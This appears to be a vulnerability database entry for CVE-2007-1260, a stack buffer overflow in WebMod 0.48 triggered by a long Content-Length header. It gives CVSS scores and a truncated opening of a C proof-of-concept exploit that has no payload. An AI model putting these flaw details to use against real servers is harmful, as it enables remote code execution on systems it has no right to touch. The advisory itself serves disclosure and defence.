7.5
CVSSv2

CVE-2007-1260

Published: 03/03/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Stack-based buffer overflow in the connectHandle function in server.cpp in WebMod 0.48 allows remote malicious users to execute arbitrary code via a long string in the Content-Length HTTP header.

Vulnerable Product Search on Vulmon Subscribe to Product

webmod webmod 0.48

Exploits

/* * WebMod Stack Buffer Overflow * * by cybermind (Kevin Masterson) * cybermind@gmailcom * * WebMod v048 exploit PoC code * */ #include <stdioh> #include <stdlibh> #include <stringh> #define WIN32_LEAN_AND_MEAN #include <windowsh> #include <winsockh> #pragma comment (lib, "ws2_32lib") /* local variab ...